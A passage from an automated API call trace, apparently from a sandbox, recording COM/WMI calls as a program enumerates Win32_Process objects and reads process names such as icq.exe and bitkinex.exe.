puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.073] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.073] IWbemClassObject:Get (in: This=0x560e498, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268bc54*=0, plFlavor=0x268bc58*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x268bc54*=8, plFlavor=0x268bc58*=0) returned 0x0 [0214.073] SysStringByteLen (bstr="icq.exe") returned 0xe [0214.073] SysStringByteLen (bstr="icq.exe") returned 0xe [0214.073] IWbemClassObject:Get (in: This=0x560e498, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268bc54*=8, plFlavor=0x268bc58*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x268bc54*=8, plFlavor=0x268bc58*=0) returned 0x0 [0214.073] SysStringByteLen (bstr="icq.exe") returned 0xe [0214.073] SysStringByteLen (bstr="icq.exe") returned 0xe [0214.073] CoTaskMemAlloc (cb=0x4) returned 0x561bf68 [0214.073] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bf68, puReturned=0x267acc0 | out: apObjects=0x561bf68*=0x560e630, puReturned=0x267acc0*=0x1) returned 0x0 [0214.074] IUnknown:QueryInterface (in: This=0x560e630, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560e630) returned 0x0 [0214.074] IUnknown:QueryInterface (in: This=0x560e630, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.074] IUnknown:QueryInterface (in: This=0x560e630, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.075] IUnknown:AddRef (This=0x560e630) returned 0x3 [0214.075] IUnknown:QueryInterface (in: This=0x560e630, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.075] IUnknown:QueryInterface (in: This=0x560e630, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.075] IUnknown:QueryInterface (in: This=0x560e630, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560e634) returned 0x0 [0214.075] IMarshal:GetUnmarshalClass (in: This=0x560e634, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.075] IUnknown:Release (This=0x560e634) returned 0x3 [0214.075] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.075] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.075] IUnknown:QueryInterface (in: This=0x560e630, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.075] IUnknown:Release (This=0x560e630) returned 0x2 [0214.075] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.075] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.075] IUnknown:QueryInterface (in: This=0x560e630, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560e630) returned 0x0 [0214.075] IUnknown:AddRef (This=0x560e630) returned 0x4 [0214.076] IUnknown:Release (This=0x560e630) returned 0x3 [0214.076] IUnknown:Release (This=0x560e630) returned 0x2 [0214.076] CoTaskMemFree (pv=0x561bf68) [0214.076] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.076] IUnknown:AddRef (This=0x560e630) returned 0x3 [0214.076] IWbemClassObject:Get (in: This=0x560e630, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.076] IWbemClassObject:Get (in: This=0x560e630, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.076] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"") returned 0x66 [0214.076] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"") returned 0x66 [0214.077] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.077] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.077] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.077] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.078] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bf68) returned 0x0 [0214.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bf68, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.078] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bf68, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a900) returned 0x0 [0214.078] WbemDefPath:IUnknown:Release (This=0x561bf68) returned 0x0 [0214.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a900, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a900) returned 0x0 [0214.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a900, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.079] WbemDefPath:IUnknown:AddRef (This=0x561a900) returned 0x3 [0214.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a900, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a900, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a900, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561bf78) returned 0x0 [0214.079] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561bf78, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.079] WbemDefPath:IUnknown:Release (This=0x561bf78) returned 0x3 [0214.079] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.079] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a900, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.079] WbemDefPath:IUnknown:Release (This=0x561a900) returned 0x2 [0214.079] WbemDefPath:IUnknown:Release (This=0x561a900) returned 0x1 [0214.079] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.079] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a900, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a900) returned 0x0 [0214.079] WbemDefPath:IUnknown:AddRef (This=0x561a900) returned 0x3 [0214.079] WbemDefPath:IUnknown:Release (This=0x561a900) returned 0x2 [0214.079] WbemDefPath:IWbemPath:SetText (This=0x561a900, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"") returned 0x0 [0214.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.079] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.080] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.080] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.080] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.080] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.080] IWbemClassObject:Get (in: This=0x560e630, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268c4b0*=0, plFlavor=0x268c4b4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x268c4b0*=8, plFlavor=0x268c4b4*=0) returned 0x0 [0214.080] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0214.080] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0214.080] IWbemClassObject:Get (in: This=0x560e630, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268c4b0*=8, plFlavor=0x268c4b4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x268c4b0*=8, plFlavor=0x268c4b4*=0) returned 0x0 [0214.080] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0214.080] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0214.080] CoTaskMemAlloc (cb=0x4) returned 0x561bfa8 [0214.080] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bfa8, puReturned=0x267acc0 | out: apObjects=0x561bfa8*=0x560e7c8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.081] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560e7c8) returned 0x0 [0214.081] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.081] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.082] IUnknown:AddRef (This=0x560e7c8) returned 0x3 [0214.082] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.082] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.082] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560e7cc) returned 0x0 [0214.082] IMarshal:GetUnmarshalClass (in: This=0x560e7cc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.082] IUnknown:Release (This=0x560e7cc) returned 0x3 [0214.082] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.082] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.082] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.082] IUnknown:Release (This=0x560e7c8) returned 0x2 [0214.082] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.082] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.082] IUnknown:QueryInterface (in: This=0x560e7c8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560e7c8) returned 0x0 [0214.082] IUnknown:AddRef (This=0x560e7c8) returned 0x4 [0214.082] IUnknown:Release (This=0x560e7c8) returned 0x3 [0214.082] IUnknown:Release (This=0x560e7c8) returned 0x2 [0214.083] CoTaskMemFree (pv=0x561bfa8) [0214.083] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.083] IUnknown:AddRef (This=0x560e7c8) returned 0x3 [0214.083] IWbemClassObject:Get (in: This=0x560e7c8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.083] IWbemClassObject:Get (in: This=0x560e7c8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.083] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"") returned 0x66 [0214.083] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"") returned 0x66 [0214.083] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.084] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.084] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.084] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.085] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bfa8) returned 0x0 [0214.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bfa8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.085] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bfa8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a9e0) returned 0x0 [0214.085] WbemDefPath:IUnknown:Release (This=0x561bfa8) returned 0x0 [0214.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a9e0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a9e0) returned 0x0 [0214.085] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a9e0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.086] WbemDefPath:IUnknown:AddRef (This=0x561a9e0) returned 0x3 [0214.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a9e0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a9e0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a9e0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561bfb8) returned 0x0 [0214.086] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561bfb8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.086] WbemDefPath:IUnknown:Release (This=0x561bfb8) returned 0x3 [0214.086] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.086] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a9e0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.086] WbemDefPath:IUnknown:Release (This=0x561a9e0) returned 0x2 [0214.086] WbemDefPath:IUnknown:Release (This=0x561a9e0) returned 0x1 [0214.086] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.086] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.086] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a9e0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a9e0) returned 0x0 [0214.086] WbemDefPath:IUnknown:AddRef (This=0x561a9e0) returned 0x3 [0214.086] WbemDefPath:IUnknown:Release (This=0x561a9e0) returned 0x2 [0214.086] WbemDefPath:IWbemPath:SetText 